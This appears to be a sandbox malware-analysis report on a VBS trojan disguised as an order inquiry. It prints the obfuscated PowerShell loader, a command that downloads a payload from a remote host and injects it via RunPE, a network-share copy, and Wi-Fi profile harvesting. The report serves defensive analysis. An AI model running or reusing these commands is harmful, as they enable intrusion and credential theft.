          Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
          Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: tmpB97.tmp.dat.9.drString found in binary or memory: https://www.mozilla.org
          Source: tmpB97.tmp.dat.9.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
          Source: tmpB97.tmp.dat.9.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
          Source: tmpB97.tmp.dat.9.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: tmpB97.tmp.dat.9.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.00000000034CE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.0000000003054000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000030C2000.00000004.00000800.00020000.00000000.sdmp, tmpE8C2.tmp.dat.9.drString found in binary or memory: https://www.office.com/
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.00000000034CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/LR
          Source: tmpE8C2.tmp.dat.9.drString found in binary or memory: https://www.office.com/Office
          Source: AddInProcess32.exe, 00000009.00000002.1735664078.000000000616C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.oracle.com/technetwork/java/javase/downloads
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54306
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 54306 -> 443
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49706 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:54306 version: TLS 1.2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

          System Summary

          barindex
          Source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8786
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8786Jump to behavior
          Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_016911849_2_01691184
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_0169125D9_2_0169125D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_016939709_2_01693970
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_01691F689_2_01691F68
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_016914419_2_01691441
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_016934E09_2_016934E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_016934D09_2_016934D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_01691F4E9_2_01691F4E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_064252089_2_06425208
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_064293D09_2_064293D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_064243D89_2_064243D8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_064293A59_2_064293A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_06423E889_2_06423E88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_066F13409_2_066F1340
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_066F13319_2_066F1331
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_066F59109_2_066F5910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_06705F689_2_06705F68
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_06707F1E9_2_06707F1E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_06708E209_2_06708E20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_06708A489_2_06708A48
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_067F2E509_2_067F2E50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_067F2EC89_2_067F2EC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_0683BBF89_2_0683BBF8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_0683CB619_2_0683CB61
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_0683BBE99_2_0683BBE9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_068CEA409_2_068CEA40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_066FC1289_2_066FC128
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_066FC1169_2_066FC116
          Source: Order Inquiry.vbsInitial sample: Strings found which are bigger than 50
          Source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winVBS@21/25@6/5
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\3dasY[1].txtJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3508:120:WilError_03
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: \Sessions\1\BaseNamedObjects\878411
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2h5ze3qi.xk1.ps1Jump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry.vbs"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: AddInProcess32.exe, 00000009.00000002.1738432443.0000000006191000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, tmp3198.tmp.dat.9.dr, tmpA565.tmp.dat.9.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "\\tsclient\C\Program Files\aburrar.vbs"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
